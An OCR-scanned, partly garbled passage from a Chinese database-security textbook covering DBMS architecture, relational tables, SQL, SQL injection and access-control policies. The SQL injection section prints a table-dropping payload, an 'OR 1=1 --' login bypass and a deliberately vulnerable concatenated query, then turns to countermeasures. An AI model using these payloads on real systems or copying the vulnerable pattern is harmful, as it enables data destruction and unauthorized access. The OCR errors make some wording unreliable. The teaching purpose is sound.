台 (UNIX, Linux, z/OS 和 Windows 等 ) 构成 的 一 个 异 构 环 境 。 这 在 很 大 程度 上 增加 了 安全 管 
理 人 员 进 行 安全 管理 的 难度 。 

另外 一 个 最 新 的 挑战 是 ， 一 些 组 织 越 来 越 依 赖 云 技 术 ， 将 企业 的 部 分 或 全 部 数据 存储 到 云 
上 ， 这 无 疑 增加 了 企业 中 负责 安全 的 员工 的 负担 。 


5.2 ”数据 库 管 理 系统 


有 些 情况 下 ， 一 个 组 织 在 仅 有 相对 简单 的 数据 文件 集合 的 情况 下 就 能 正常 运转 。 每 个 文件 
可 能 包含 文本 (如 备忘录 和 报告 ) 或 者 数值 数据 (如 电子 表格 )， 内 容 更 详细 的 文件 由 一 组 记录 
组 成 。 然 而 ， 对 于 任何 一 个 较 大 规模 的 组 织 来 说 ， 则 需要 一 种 叫 作 数 据 库 的 更 复杂 的 结构 。 数 
HÆ (database) 是 存储 一 个 或 多 个 应 用 所 用 数据 的 结构 化 数据 集合 。 除 去 数据 ， 数 据 库 还 包 
含 数据 项 之 间 以 及 数据 项 组 之 间 的 关系 。 下 面 这 个 例子 说 明了 数据 文件 和 数据 库 之 间 的 区 别 。 
一 个 简单 的 人 事 文件 可 能 包含 一 组 记录 。 每 条 记录 对 应 一 名 职工 ， 给 出 该 职工 的 姓名 、 居 住地 
址 、 出 生日 期 、 职 位 、 工 资 ， 以 及 人 事 部 门 需要 的 其 他 详细 信息 。 而 人 事 数据 库 除 了 包括 上 面 
描述 的 人 事 文件 之 外 ,还 可 以 包含 考勤 文件 以 便 用 来 记录 每 名 职工 每 周 的 工作 小 时 数 。 这 两 个 
文件 通过 数据 库 机 制 关 联 起 来 ， 以 便 工 资 单程 序 (payroll program) 提取 出 每 名 职工 的 工作 时 
间 和 基本 薪水 并 生成 工资 单 。 

经 常 和 数据 库 一 并 提起 的 另 一 个 概念 是 数据 库 管 理 系 统 ( DataBase Management System, 
DBMS)， 它 是 创建 、 维 护 数据 库 并 为 多 个 用 户 
和 应 用 提供 特定 的 查询 服务 的 程序 套件 。 查 询 
语言 ( query language) 为 用 户 和 应 用 提供 了 访 
问 数 据 库 的 统一 接口 。 

图 5-1 给 出 了 DBMS 体系 结构 的 简化 框 
图 。 开 发 者 使 用 数据 定义 语言 ( Data Definition 
Language, DDL) 来 定义 数据 库 的 逻辑 结构 
和 过 程 属性 ， 将 其 表示 为 一 组 数据 库 描述 
# (database description table)。 数 据 操纵 语言 Pe Deeg 
( Data Manipulation Language, DML) 为 应 用 文件 管理 
开发 者 提供 了 一 组 强大 的 工具 。 查 询 语言 是 为 
终端 用 户 设 计 的 说 明 性 语言 。 数据 库 管 理 系 统 DDL = 数据 定义 语言 
利用 数据 库 描述 表 来 管理 物理 数据 库 。 访 问 数 DML= 数 据 操纵 语言 
据 库 的 接口 是 文件 管理 器 模块 和 事务 管理 器 模 图 5-1 DBMS 体系 结构 
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块 。 除 去 数据 库 描述 表 之 外 ， 还 有 两 个 表 用 来 支持 DBMS : 授权 表 (authorization table) 用 于 
确保 用 户 具 有 执行 数据 库 查询 语句 的 权限 ; 并 发 访问 表 (concurrent access table) 用 于 在 同时 执 
行 冲突 命令 时 避免 产生 冲突 。 

数据 库 系统 对 于 海量 数据 提供 了 高 效 的 访问 ， 这 对 于 很 多 组 织 的 业务 运转 是 至 关 重 要 的 。 
由 于 这 些 业 务 的 复杂 性 和 关键 性 ， 数 据 库 系统 产生 了 新 的 安全 需求 ， 这 些 需 求 超出 了 一 般 的 基 
于 OS 的 安全 机 制 或 者 独立 的 安全 包 (stand-alone security package) 所 具有 的 能 力 。 

操作 系统 的 安全 机 制 一 般 控制 对 整个 文件 的 读 写 访问 ， 所 以 它 可 以 用 来 控制 是 否 允 许 用 户 
读 写 某 个 文件 (如 人 事 文件 ) 中 的 任何 信息 ， 但 不 能 用 来 限制 访问 该 文件 中 的 具体 记录 或 字段 。 
DBMS 却 允 许 指 定 这 种 更 精细 的 访问 控制 。 它 通常 还 能 实现 对 更 多 的 命令 施加 访问 控制 ， 比 如 
选择 、 插 入 、 更 新 或 者 删除 数据 库 中 的 指定 项 。 因 而 ， 专 为 数据 库 系统 设计 并 与 其 集成 在 一 起 
的 安全 服务 和 安全 机 制 是 必需 的 。 


5.3 关系 数据 库 


关系 数据 库 的 基本 构件 是 数据 表 。 数 据 表 类 似 于 电子 表格 ， 由 行 和 列 组 成 。 每 列 包含 
某 种 类 型 的 数据 ， 每 行 包含 这 些 列 的 一 组 指定 值 。 理 想 情况 下 ， 表 中 至 少 存在 一 列 ， 其 值 
是 唯一 的 ， 作 为 指定 项 的 标识 符 。 例 如 ， 一般 的 电话 号 码 簿 中 ， 每 一 项 表示 一 个 用 户 ， 其 
中 各 列 分 别 表示 姓名 、 电 话 号 码 和 地 址 。 这 样 的 表 叫 作 平 面 文件 ( flat file)， 因 为 它 是 单一 
的 二 维 数据 。 在 平面 文件 中 ， 所 有 的 数据 都 存储 在 单个 表 中 。 对 于 电话 号 码 敌 ， 可 能 铬 干 
用 户 具 有 相同 的 姓名 ， 但 电话 号 码 应 该 是 唯一 的 。 因 此 以 电话 号 码 作为 一 行 的 唯一 标识 符 。 
然而 ,使 用 相同 电话 号 码 的 两 个 或 多 个 人 可 能 都 列 在 号 码 簿 中 。 为 了 继续 将 电话 号 码 簿 的 
所 有 数据 保持 在 单个 表 中 ， 并 为 每 行 提供 唯一 的 标识 符 ， 我们 可 以 分 离 出 新 的 列表 示 该 号 
码 的 第 二 用 户 、 第 三 用 户 等 。 这 样 ， 对 于 正在 使 用 的 每 个 电话 号 码 ， 在 表 中 都 有 唯一 项 与 
之 对 应 。 

使 用 单个 表 的 缺点 是 某 一 行 的 某 些 列 位 置 可 能 是 空 的 (没有 使 用 )。 而 且 ,， 每 当 有 新 服务 
或 者 新 信息 合成 到 数据 库 中 时 ， 必 须 添加 更 多 的 列 ， 数 据 库 和 相关 软件 也 必须 重新 设计 、 重 新 
构建 。 

关系 数据 库 的 结构 使 得 多 个 表 通 过 在 所 有 表 中 都 出 现 的 唯一 标识 符 联系 在 一 起 。 图 5-2 显 
示 了 在 不 重建 主 表 的 情况 下 ， 如 何 将 新 的 服务 和 特征 添加 到 电话 数据 库 中 。 在 这 个 例子 中 ， 主 
表 包 含 每 个 电话 号 码 的 基本 信息 。 电 话 号 码 作为 主键 。 数 据 库 管 理 员 可 以 接着 定义 新 表 ， 其 中 
一 列 是 前 面 定 义 的 主键 ， 其 他 列 包含 其 他 信息 。 

用 户 和 应 用 通过 关系 查询 声言 来 访问 数据 库 。 查 询 语言 使 用 的 是 说 明 性 语句 而 不 是 编程 
语言 的 过 程 性 指令 。 一 般 来 说 ,查询 语言 允许 用 户 请 求 满足 一 组 给 定 条 件 的 记录 中 的 选 定数 据 
Tho 然后， 软件 决定 如 何 从 一 个 或 多 个 表 中 提取 出 所 请 求 的 数据 。 例 如 ， 电 话 公 司 代 理 能 够 
检索 出 用 户 的 账单 信息 以 及 特殊 服务 或 最 近 收 缴 话费 的 状态 ， 所 有 检索 出 的 信息 都 显示 在 屏 
幕 上 。 


5.3.1 关系 数据 库 系统 要 素 


在 关系 数据 库 术语 中 ， 基 本 构件 是 平面 表 一 一 关系 (relation)。 行 被 称 为 元 组 (tuple )， 列 
被 称 为 属性 (attribute) (LÆ 5-1 )。 主 键 (primary key) 用 来 唯一 地 标识 表 的 一 行 ， 它 由 一 个 或 
多 个 列 名 组 成 。 在 图 5-2 的 例子 中 ， 单 一 属性 〈 电 话 号 码 ) 完全 可 以 唯一 标识 特定 表 中 的 每 一 
行 。 图 5-3 给 出 了 一 个 关系 数据 库 表 的 抽象 模型 ， 其 中 包括 X 个 个 体 (或 称 实体 ) 和 M 个 属 
性 。 每 一 个 属性 4; 有 |4i| 个 可 能 的 取 值 ， 而 xi 表示 实体 的 7 属性 的 取 值 。 
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表 5-1 关系 数据 库 的 基本 术语 


正式 名 其 他 名 字 
关系 文件 
元 组 行 记录 
属性 列 字段 








图 5-2 关系 数据 库 模型 举例 。 关 系数 据 库 通 过 图 5-3 关系 数据 库 的 抽象 模型 
指定 的 键 将 多 个 表 关 联 起 来 ， 本 例 中 ， 
键 是 电话 号 码 字段 
要 创建 两 个 表 之 间 的 联系 ， 在 一 个 表 中 定义 为 主键 的 属性 必须 作为 另 一 个 表 的 属性 出 现 ， 
称 为 后 者 的 外 键 (foreign key)。 主 键 的 值 对 于 它 所 在 的 表 中 的 每 个 元 组 ( 行 ) 必须 是 唯一 的 ， 
而 外 键 的 值 在 表 中 可 以 多 次 出 现 ， 因 此 主键 所 在 的 表 中 的 一 行 与 外 键 所 在 的 表 中 的 多 行 之 间 
是 一 对 多 的 关系 。 图 5-4a 给 出 一 个 例子 。 在 Department 表 中 ， 部 门 ID (Did) 是 主键 ， 每 个 
值 都 是 唯一 的 。 该 表 给 出 了 每 个 部 门 的 ID 、 名 字 (Dname) 和 账号 (Dacctno)。Employee RE 
含 每 个 职工 的 姓名 ( Ename)、 工 资 代 码 (Salarycode), HAT ID (Eid) 和 电话 号 码 ( Ephone). 
Employee 表 还 通过 Did 字段 指出 了 每 个 职工 所 属 的 部 门 。Did 是 Employee 表 的 外 键 ， 它 建立 
J Employee 表 和 Department 表 之 间 的 联系 。 
视图 (view) 是 一 个 虚 表 。 本 质 上 ， 视 图 是 从 一 个 或 多 个 表 中 返回 的 选 定 行 与 列 的 查询 结 
果 。 图 5-4b 是 一 个 视图 ， 包 括 Employee 表 中 的 职工 名 、ID、 电 话 号 码 和 Department 表 中 对 应 
的 部 门 名 ， 通 过 Did 字段 将 两 个 表 连 接 起 来 。 因 此 视图 中 既 包 含 来 自 Employee 表 每 行 的 数据 ， 
又 包含 来 自 Department 表 的 附加 数据 。 视 图 也 可 以 由 单个 表 创 建 。 例 如 ，Employee 表 的 一 个 
视图 可 以 包含 其 所 有 行 ， 但 删除 工资 代码 字段 。 视 图 可 以 被 限定 仅仅 包含 某 些 行 或 某 些 列 。 例 
如 ， 一 个 视图 可 以 定义 为 包含 Employee 表 中 Did=15 的 所 有 行 。 
视图 经 常用 于 安全 目的 。 视 图 能 够 提供 对 关系 数据 库 的 受 限 访问 ， 因 而 用 户 或 应 用 只 能 访 
问 某 些 行 或 列 。 


5.3.2 ”结构 化 查询 语言 
结构 化 查询 语言 ( Structure Query Language, SQL) 最 初 是 由 IBM 于 20 世纪 70 年 代 中 期 
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开发 的 ， 是 能 够 对 关系 数据 库 中 的 数据 进行 定义 、 操 纵 和 查询 的 标准 语言 。ANSIISO 制定 的 
SQL 标准 有 几 个 版 本 ， 并 有 多 种 不 同 的 实现 ， 但 都 遵循 相同 的 基本 语法 和 语义 。 


Department#é Employee 


[Did]  Dname | Dacetno | [Ename [Did] Salarycode] Eid | Ephone 

















4 [human resources | 528221 | [Robin |15| 23 [2345| 6127092485 | 
(8 [education | 202035 | 5088 | 6127092246 | 
(9 [accounts | 709257 | [Jasmine| 4| 26 | 7712 | 6127099348 | 
15|services | 223945 | [Holly | 8| 23 | 3054] 6127092729 | 
二 一 M 24 
主键 9| 21 |4490| 6127099380 | 

~ 一- 一 一 一 一 一 

外 键 主键 










[—Dname | Ename] Eid | 
3054 
education [Robin | 2976 | 6127091945 
public relations [Neil | 5088 
services [Robin | 2345 | 6127092485 
9664 


b) 从 关系 数据 库 导出 的 视图 
图 5-4 关系 数据 库 实例 
例如 ， 图 5-4a 中 的 两 个 表 定 义 如 下 : 


CREATE TABLE department ( 
Did INTEGER PRIMARY KEY, 
Dname CHAR (30), 

Dacctno CHAR (6) ) 

CREATE TABLE employee ( 
Ename CHAR (30), 

Did INTEGER, 

SalaryCode INTEGER, 

Eid INTEGER PRIMARY KEY, 

Ephone CHAR (10), 

FOREIGN KEY (Did) REFERENCES department (Did) ) 


检索 信息 的 基本 命令 是 SELECT 语句 。 请 看 下 面 这 个 例子 : 


SELECT Ename, Eid, Ephone 
FROM Employee 
WHERE Did = 15 


这 个 查询 从 Employee 表 返 回 15 号 部 门 的 所 有 职工 的 Ename、Eid 和 Ephone 字段 。 
图 5-4b 中 的 视图 是 通过 下 面 的 SQL 语句 建立 的 : 

CREATE VIEW newtable (Dname, Ename, Eid, Ephone) 

AS SELECT D.Dname E.Ename, E.Eid, E.Ephone 


FROM Department D Employee E 
WHERE E.Did = D.Did 


前 面 列举 的 仅仅 是 SQL 功能 的 几 个 例子 。SQL 语句 能 够 创建 表 、 插 入 和 删除 表 中 的 数据 、 
创建 视图 、 通 过 查询 语句 检索 数据 。 





BIE BRHEESARZE 107 


54 SQL 注入 攻击 


SQL 注入 ( 简 记 为 SQLi) 攻击 是 一 类 针对 数据 库 的 最 普遍 和 最 危险 的 基于 网 络 的 安全 威 
办 。 请 看 下 面 报 道 : 

1. 2013 年 7 月 的 Imperva Web 应 用 攻击 报告 (Imperva Web Application Attack Report) 
[IMPE13] 调查 了 一 些 工业 企业 的 Web 应 用 服务 器 ， 并 监视 了 八 种 常见 的 攻击 方式 。 调 查 发 
现 ， 在 攻击 事件 的 总 数 、 每 个 攻击 事件 的 攻击 请 求 总 数 、 一 个 月 内 某 应 用 章 受 至 少 一 次 攻击 事 
件 的 平均 天 数 等 指标 中 ，SQLi 攻击 均 名 列 第 一 位 或 第 二 位 。Imperva 还 发 现 一 天 之 内 某 Web 
站 点 竟然 收 到 过 高 达 94 057 个 SQLi 攻击 请 求 。 

2. 开 放 Web 应 用 安全 项 目 (The Open Web Application Security Project) 2013 年 的 报告 
[OWAS13] 中 关于 最 重要 的 十 大 Web 应 用 安全 威胁 就 包含 了 注入 攻击 ， 而 SQLi 攻击 则 名 列 榜 
首 。 这 份 排 名 从 2010 年 的 报告 开始 一 直 没 有 改变 过 。 

3. Veracode 2016 软件 安全 状况 报告 (The Veracode 2016 State of Software Security Report) 
[VERA16] 指出 ， 遭 受 SQLi 攻击 的 应 用 约 占 35%. 

4. Trustwave 2016 年 全 球 安全 报告 ( The Trustwave 2016 Global Security Report) [TRUS16] 
将 SQLi 攻击 列 为 最 重要 的 两 种 人 侵 技 术 之 一 。 该 报告 指出 ,SQLi 可 对 敏感 数据 构成 严重 威胁 ， 
例如 个 人 身份 信息 (PID 和 信用 卡 数据 ， 并 且 SQLi 攻击 相对 来 讲 易于 实施 但 难于 预防 。 

一 般 而 言 ，SQLi 攻击 利用 的 是 Web 应 用 程序 页 面 的 性 质 。 与 过 去 的 静态 网 页 相 比 ， 目 前 
大 多 数 网 站 都 有 动态 组 件 和 内 容 。 许 多 这 样 的 页 面 可 以 请 求 信 息 ， 如 位 置信 息 、 个 人 身份 信息 
和 信用 卡 信 息 等 。 这 些 动态 的 内 容 一 般 需 要 传输 到 后 台数 据 库 或 者 从 后 台数 据 库 传输 而 来 ， 而 
后 台数 据 库 中 往往 存 有 大 量 的 信息 ， 例 如 从 持 卡 人 数据 到 经 常 购买 的 跑鞋 的 类 型 等 任意 数据 。 
应 用 程序 服务 器 网 页 将 通过 SQL 查询 语句 癌 数据 库 发 送 和 接收 重要 的 信息 ， 以 满足 民 好 的 用 
户 体 验 。 

在 这 样 的 环境 中 ， 通 过 发 送 恶 意 的 SQL 命令 到 数据 库 服务 器 就 可 以 发 起 SQLi KH. Reis 
见 的 攻击 目标 是 从 数据 库 中 批量 提取 数据 。 攻 击 者 可 以 在 数据 库 表 中 转 储 数 十 万 个 客户 记录 。 
根据 环境 的 不 同 ， 还 可 以 利用 SQL 注入 来 修改 或 删除 数据 、 执 行 任意 操作 系统 命令 或 局 动 拒 
绝 服 务 ( DoS) 攻击 。SQL 注入 攻击 只 是 多 种 注入 攻击 的 一 种 ,我 们 将 在 11.2 节 中 更 为 详细 地 
讨论 它 。 


5.4.1 一 种 典型 的 SQLi 攻击 


SQLi 是 一 种 利用 数据 库 层 应 用 (如 查询 ) 中 存在 的 安全 漏洞 而 发 起 的 攻击 。 使 用 SQL 注 
入 ,攻击 者 可 以 提取 或 操纵 Web 应 用 的 数据 。 用 户 的 输入 被 当 作 藤 入 在 SQL 语句 中 的 字符 串 
转 义 字符 而 被 错误 地 过 滤 或 者 用 户 输入 是 非 强 类 型 而 被 意外 执行 ， 在 这 两 种 情形 下 都 可 能 发 生 
SQL 注入 攻击 。 

图 5-5 摘自 [ACUN13]， 是 一 个 典型 的 SQLi 攻击 的 例子 。 所 涉及 的 步骤 如 下 : 

1. 攻击 者 找到 Web 应 用 的 脆弱 点 ， 然 后 通过 向 Web 服务 器 发 送 命令 来 对 数据 库 注 和 SQL 
命令 。 这 些 命令 注入 到 将 被 防火 墙 接受 的 网 络 流量 中 。 

2. Web 服务 器 接收 到 恶意 代码 ， 然 后 发 送 给 Web MHAIRI AY o 

3. Web 应 用 服务 器 收 到 Web 服务 器 的 恶意 代码 后 ， 将 其 发 送 给 数据 库 服 务 需 。 

4. 数据 库 服 务 器 在 数据 库 上 执行 恶意 代码 。 数 据 库 从 信用 卡 表 中 返回 数据 。 

5. Web 应 用 服务 需 动 态 地 生成 一 个 包含 数据 库 信用 卡 表 详 细 信息 的 页 面 。 

6. Web 服务 需 阿 攻击 者 发 送信 用 卡 详细 信息 。 


156 
i 
157 
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图 例 : 

— 数据 在 攻击 者 
和 服务 器 之 间 
交换 

攻击 者 和 Web 

Y 服务 器 之 间 的 
双 问 通信 
从 数据 库 检索 
信用 卡 数据 


图 5-5 典型 的 SQL 注入 攻击 


5.4.2 注入 技术 


SQLi 攻击 的 方法 通常 是 在 SQL 语句 中 提前 终止 文本 串 ， 随 后 附加 新 的 命令 。 因 为 插 和 人 的 
命令 在 其 被 执行 前 可 能 含有 额外 附加 的 字符 串 ， 攻 击 者 利用 注释 符 “--” 来 终止 注入 的 字符 
串 。 这 样 ， 后 面 的 文本 在 执行 时 就 被 忽略 了 。 

举 一 个 简单 的 例子 ， 考 虑 下 面 的 脚本 ， 其 中 的 SQL 查询 是 由 预定 义 字 符 串 和 用 户 输入 的 
文本 组 合 而 成 的 : 

var Shipcity; 

ShipCity = Request.form (“ShipCity”) ; 

var sql = “select * from OrdersTable where ShipCity = ‘” + 

ShipCity + Vya; 


这 些 代码 脚本 的 设计 者 的 意图 是 让 用 户 输入 城市 的 名 称 。 例 如 ， 当 脚本 执行 时 ， 用 户 被 提 
示 输 入 城市 名 称 ， 如 果 用 户 输入 Redmond， 那 么 将 生成 如 下 SQL 查询 语句 : 


SELECT * FROM OrdersTable WHERE ShipCity = ‘Redmond’ 


然而 如 果 用 户 输入 如 下 语句 : 


Boston’; DROP table OrdersTable-- 


将 导致 如 下 的 SOL 查询 : 


SELECT * FROM OrdersTable WHERE ShipCity = 
‘Redmond’; DROP table OrdersTable-- 


上 述 查 询 语句 中 的 分 号 用 以 分 离 两 个 命令 ， 两 个 连接 号 则 表明 注释 掉 后 面 的 命令 而 不 执 
行 。 当 SQL 服务 器 执行 这 一 语句 时 ， 它 将 首先 选择 OrdersTable where ShipCity is Redmond 的 
所 有 记录 。 然 后 ， 执 行 DROP 请 求 ， 将 整个 表 删 除 。 


5.4.3 
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SQLi 攻击 途径 和 类 型 


我 们 可 以 根据 攻击 途径 和 攻击 类 型 来 描述 SQL 攻击 [CHAN11, HALF06]。 主 要 的 攻击 途 


APRA: 采用 这 一 方式 的 攻击 者 ， 通 过 精心 构造 用 户 输入 来 注 人 SQL fit. Web 应 
用 程序 可 以 根据 部 署 应 用 程序 的 环境 以 多 种 方式 读 取 用 户 输入 。 在 大 多 数 针 对 Web 应 
用 程序 的 SQLi 攻击 中 ， 用 户 输入 通常 来 自 通 过 HTTP GET 或 POST 请 求 发 送 到 Web 
应 用 程序 的 表单 提交 。Web 应 用 程序 通常 能 够 访问 这 些 请 求 中 包含 的 用 户 输入 ， 因 为 
它们 将 访问 环境 中 的 任何 其 他 变量 。 

服务 器 变量 : 服务 器 变量 是 包含 HTTP 头 部 、 网 络 协议 头 部 、 环 境 变量 等 数据 的 变量 
集合 。Web 应 用 程序 以 多 种 方式 使 用 这 些 服务 器 变量 ,例如 记录 使 用 情况 统计 信息 和 
识别 浏览 趋势 。 如 果 这 些 变量 不 经 过 处 理 就 直接 记录 在 数据 库 中 ， 则 可 能 会 产生 SQL 
注 和 漏洞。 由 于 攻击 者 可 以 伪造 HTTP 和 网 络 报头 中 的 值 ， 因 此 可 以 利用 此 漏洞 将 数 
据 直 接 放 和 报头 。 当 记录 服务 器 变量 的 查询 发 给 数据 库 时 ， 将 触发 伪造 报头 中 的 攻击 。 
二 阶 注入 : 如 果 针 对 SQL 的 预防 机 制 不 够 完整 ， 可 能 会 出 现 二 阶 注入 攻击 。 在 二 阶 注 
入 中， 亚 意 用 户 可 以 利用 系统 或 数据 库 中 已 存在 的 数据 来 触发 一 个 SQL 注入 攻击 ， 因 
此 当 这 种 攻击 出 现时 ， 引 发 攻击 的 输入 并 不 来 自 于 用 户 ， 而 是 来 自 于 系统 自身 。 

cookie : 当 客 户 端 返回 到 Web 应 用 时 ，cookie 可 以 用 来 恢复 客户 端的 状态 信息 。 由 于 
客户 端 可 以 控制 cookie， 所 以 攻击 者 可 以 借 此 机 会 更 改 cookie， 以 便 在 应 用 程序 服务 
做 基于 cookie 的 内 容 构建 SQL 查询 时 修改 查询 的 结构 和 功能 。 

物理 用 户 输入 : 除了 Web 请 求 外 ， 还 有 其 他 可 以 用 于 SQL 注入 的 用 户 输入 。 用 户 输入 
形式 可 以 是 常见 的 条 形 码 、 射 频 识 别 (RFID) 标签 ， 甚 至 是 能 够 利用 图 像 识 别 技术 扫 
摘 然 后 发 送 到 数据 库 系 统 的 纸 质 形式 。 


攻击 方式 大 体 上 可 以 划分 为 三 类 : 带 内 (inband)、 推 理 (inferential)、 带 外 (out-of-band). 
带 内 攻击 ( inband attack) 使 用 同样 的 通信 信道 来 完成 SQL 代码 注入 和 结果 返回 。 这 些 返 回 的 
数据 可 以 直接 呈现 在 Web 页 面 上 。 带 内 攻击 方式 包括 以 下 几 种 : 


重 言 式 : 这 种 形式 的 攻击 是 将 代码 注入 一 个 或 多 个 永 真 的 条 件 表达 式 中 。 例 如 ， 考 虑 
下 面 的 情况 ， 要 求 用 户 输 入 一 个 有 效 的 名 字 和 密码 : 


Squery = “SELECT info FROM user WHERE name = 

'S_GET[“name”]’ AND pwd = ‘*$_GET[“pwd”]’'”; 

假设 攻击 者 提交 "'OR 1 = 1 - -'" 作为 名 字 字 段 ， 查 询 的 结果 会 变 成 这 样 ， 
SELECT info FROM users WHERE name = ` ` OR 1=1 -- AND pwpd = ` ^ 


这 种 注入 代码 能 够 使 得 口令 检查 失效 (由 于 使 用 了 注释 符 --)， 使 整个 WHERE 语 
句 变 为 重 言 式 。 数 据 库 使 用 条 件 句 来 判断 某 行 是 否 为 查询 结果 ， 当 条 件 句 恒 为 真 时 ， 
查询 会 返回 表 中 所 有 的 行 。 
行 尾 注释 : 在 注入 代码 到 特定 字段 之 后 ， 字 段 之 后 的 合法 代码 会 被 注释 标记 为 无 效 字 
段 。 比 如 在 输入 之 后 添加 “ --” 会 使 得 之 后 的 查询 变 为 不 可 执行 的 注释 。 上 述 关 于 重 
言 式 的 例子 也 属于 这 种 方式 。 
Brew: 攻击 者 在 预期 查询 之 外 添加 额外 的 查询 ， 使 攻击 行为 与 合法 请 求 一 同 被 执 
行 。 这 种 技术 依赖 于 服务 右 的 配置 是 否 允 许 在 同一 个 字符 串 中 含有 多 个 查询 语句 。 上 
一 小 三 提 到 的 例子 就 属于 这 种 方式 。 


推理 攻击 ( inferential attack) 方式 中 ,没有 实际 的 数据 传输 ， 但 攻击 者 能 够 通过 发 送 特定 
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的 请 求 和 观察 网 站 或 数据 库 服务 器 的 响应 行为 来 重新 构造 信息 。 推 理 攻 击 方式 包括 以 下 几 种 : 
e 非法 /逻辑 错误 查询 : 攻击 者 将 关于 Web 应 用 程序 后 台数 据 库 的 类 型 和 结构 等 重要 信 
息 收 集 起 来 。 这 种 方式 一 般 作 为 其 他 攻击 的 初步 信息 收集 步 又。 这 种 攻击 利用 的 漏洞 
是 应 用 服务 器 返回 的 默认 错误 页 面 通常 描述 了 过 多 的 细节 内 容 。 事 实 上 ， 生 成 错误 消 
息 的 简单 事实 稼 党 会 癌 攻 击 者 揭示 易 受 攻击 / 可 注入 的 参数 。 
© 盲 SQL 注入 : 育 SQL 注入 允许 攻击 者 推测 数据 库 系 统 中 的 数据 ， 即 使 系统 足够 安全 ， 
也 不 会 将 错误 信息 展示 给 攻击 者 。 攻 击 者 问 服 务 器 询问 真 假 问 题 。 如 果 注 入 的 语句 为 
真 ， 则 该 网 站 将 继续 正常 运行 ;如果 语句 为 假 ， 则 虽然 没有 描述 性 错误 消息 ， 但 页 面 
仍 会 与 正常 运行 的 页 面 明 显 不 同 。 
在 带 外 攻击 (out-of-band attack) 中 ， 检 索 数 据 使 用 不 同 的 通信 信道 (例如 生成 一 个 带 有 查 
询 结果 的 电子 邮件 并 发 送 给 测试 者 )。 这 一 方式 可 用 于 信息 检索 受 限 制 但 数据 库 服务 器 带 外 连 
接 不 严格 的 情况 。 


5.4.4 SQLi 应 对 措施 


由 于 SQLi 攻击 如 此 普遍 ， 破 坏 力 极 强 ， 而 且 攻 击 途 径 和 攻击 类 型 宣 于 变化 ， 因 此 单一 的 
防范 策略 是 不 够 的 ， 还 需要 一 套 完整 的 防范 技术 。 下 面 我 们 将 简要 地 概述 正在 使 用 或 研究 中 的 
各 种 SQLi 应 对 措施 。 采 用 [SHAR13] 中 提供 的 分 类 方法 ， 这 些 应 对 措施 可 分 为 3 类 : 防御 性 
编码 、 检 测 和 运行 时 阻 断 。 

许多 SQLi 攻击 之 所 以 能 够 成 功 ， 是 由 于 开发 者 不 良 的 编程 习惯 导致 的 ， 我 们 将 在 第 11 
章 讨 论 。 因 此 ， 防 御 性 编码 是 明显 减少 SQLi 威胁 的 有 效 方法 。 防 御 性 编码 的 实例 包括 : 

e 手动 防御 性 编码 实践 : SQLi 攻击 利用 的 漏洞 是 不 充分 的 输入 验证 。 消 除 这 些 漏洞 的 最 
直接 的 解决 方法 是 应 用 适当 的 防御 性 编码 实践 ， 例 如 进行 输入 类 型 的 检查 ， 如 果 是 数 
值 型 输入 ， 应 该 检查 其 是 否 不 含有 字符 而 只 含有 数字 。 这 种 技术 能 够 避免 数据 库 管 理 
系统 遭受 基于 强迫 性 错误 (forcing error) 的 攻击 。 男 一 种 防御 性 编码 实践 是 进行 模式 
匹配 ， 以 便 区 分 正常 输入 和 异常 输入 。 

e 参数 化 查询 插入 : 这 种 方法 尝试 允许 开发 人 员 制 定 一 些 策略 来 实现 避免 SQLi 攻击 的 目 
的 ， 比 如 ， 更 为 准确 地 指定 SQL 查询 的 结构 ， 独 立地 传递 值 参 数 以 便 不 允许 任何 不 良 
的 用 户 输入 修改 查询 结构 等 。 

e SQL DOM : SQL DOM 是 一 组 文 持 目 动 数据 类 型 验证 和 转 义 的 类 [MCCL05]。 这 种 方 
法 利用 数据 库 查 询 的 封装 性 来 提供 访问 数据 库 的 安全 可 靠 的 方法 ， 它 将 查询 构建 过 程 
从 使 用 未 经 管制 的 不 规范 的 字符 串 连 接 更 改 为 使 用 类 型 检查 API 的 系统 过 程 。 通 过 使 
用 API， 开 发 人 员 能 够 系统 地 应 用 编码 最 佳 实践 ， 如 输入 过 滤 和 严格 的 用 户 输入 类 型 
检查 。 

目前 已 经 开发 了 许多 检测 方法 ， 包 括 以 下 几 种 : 

e 基于 签名 : 这 项 技术 试图 匹配 特定 的 攻击 模式 。 这 种 方法 必须 不 断 更 新 ， 并 且 不 能 用 
于 自我 修改 的 攻击 。 

e 基于 异常 : 这 种 方法 试图 定义 正常 行为 ， 然 后 检测 正常 范围 之 外 的 行为 模式 。 目 前 有 
很 多 方法 可 以 应 用 。 一 般 来 讲 ， 此 方法 拥有 一 个 让 系统 学 习 正 常 行为 模式 的 训练 阶段 ， 
接 下 来 还 有 一 个 用 于 测试 的 实际 检测 阶段 。 

e 代码 分 析 : 代码 分 析 技 术 包 括 对 检测 SQL 注 和 人 漏洞 的 测试 集 的 使 用 。 该 测试 集 旨 在 生 
成 广泛 的 SQLi 攻击 ， 并 评价 系统 的 响应 。 

最 后 ， 目 前 已 经 开发 出 了 许多 运行 时 阻 断 技术 用 于 对 抗 SQLi 攻击 。 这 些 技术 在 运行 时 检 
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测 查询 是 否 与 期 望 查询 模型 一 致 。 目 前 已 经 出 现 了 许多 可 用 于 此 目的 的 自动 化 工具 [CHAN11， 
SHAR13]。 


5.5 数据 库 访问 控制 


商业 的 和 开源 的 DBMS 通常 提供 对 数据 库 的 访问 控制 能 力 。DBMS 的 运行 是 基于 计算 机 
系统 已 经 鉴别 了 每 个 用 户 的 假设 的 。 计 算 机 系统 可 以 使 用 的 一 道 附加 防线 是 用 第 4 章 描述 的 所 
有 访问 控制 机 制 来 确定 用 户 是 否 有 权限 访问 整个 数据 库 。 对 于 通过 鉴别 并 被 授权 访问 数据 库 的 
用 户 ， 数 据 库 访问 控制 系统 提供 特定 的 能 力 来 控制 用 户 访问 数据 库 的 一 部 分 。 

商业 的 和 开源 的 DBMS 提供 自主 的 或 基于 角色 的 访问 控制 。 另 外 ， 有 关 强 制 访 问 控制 的 
讨论 我 们 将 放 到 第 27 章 。 一 般 来 说 ，DBMS 可 以 支持 不 同 的 管理 策略 ， 这 些 策略 如 下 : 

e 集中 管理 (centralized administration): 少量 的 特权 用 户 可 以 授予 和 回收 访问 权 。 

e 基于 所 有 权 的 管理 (ownership-based administration): 表 的 属 主 (创建 者 ) 可 以 授予 和 回 

收 该 表 的 访问 权 。 
© 分 散 管 理 (decentralized administration): 表 的 属 主 除 了 可 以 授予 和 回收 该 表 的 访问 权 外 ， 
